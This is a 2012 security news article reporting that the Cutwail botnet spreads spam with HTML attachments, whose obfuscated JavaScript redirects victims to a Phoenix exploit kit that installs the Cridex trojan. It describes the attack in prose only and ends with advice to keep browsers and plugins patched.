Cutwail botnet intensifies spam spewing
Posted on 17.02.2012
The old Cutwail botnet is still alive and spamming from its 1,5 million bots, and has lately been spotted using malicious HTML attachments.

The spam emails vary from fake forwarded Xerox scans and invoices from various companies to bogus suspended bank account notice:


As many mail clients have default settings that don't favor the automatic opening of attached HTML documents, the user must click on the document in order to open it.

"The first half of the HTML code is the benign part," explain M86 Security researchers. "It provides the 'You are redirecting…' text in the browser title bar and prints 'Please wait… Loading...' in the browser – the cybercriminal perhaps just being courteous. The second and malicious part is the script tag where the obfuscated JavaScript resides. The JavaScript writes an iframe that loads a webpage in the same browser window."

The webpage in question hosts the Phoenix exploit code, which tries to exploit a number of browser and plugin vulnerabilities in order to download and install malware - in this particular case, the data-stealing Cridex Trojan.

The researchers also managed to get a peek into the server’s “Phoenix Exploit’s Kit” admin page, and it seems that some 15 percent of the users landing on the exploit page by way of the malicious HTML documents get compromised.

"Spammers tend to recycle spam campaign themes, sometimes adding different twists. So we expect more of these types of HTML attachment campaigns to come in the future," they concluded with a warning.

I would also add - make sure your browser and its plugins are always up to date, as well as other software you use that you know is often buggy and popular both with endpoint users and attackers.






Spotlight

The synergy of hackers and tools at the Black Hat Arsenal

Posted on 27 August 2014.  |  Tucked away from the glamour of the vendor booths and the large presentation rooms filled with rockstar sessions, was the Arsenal - a place where developers were able to present their security tools and grow their community.


Weekly newsletter

Reading our newsletter every Monday will keep you up-to-date with security news.
  



Daily digest

Receive a daily digest of the latest security news.
  

DON'T
MISS

Mon, Sep 1st
    COPYRIGHT 1998-2014 BY HELP NET SECURITY.   // READ OUR PRIVACY POLICY // ABOUT US // ADVERTISE //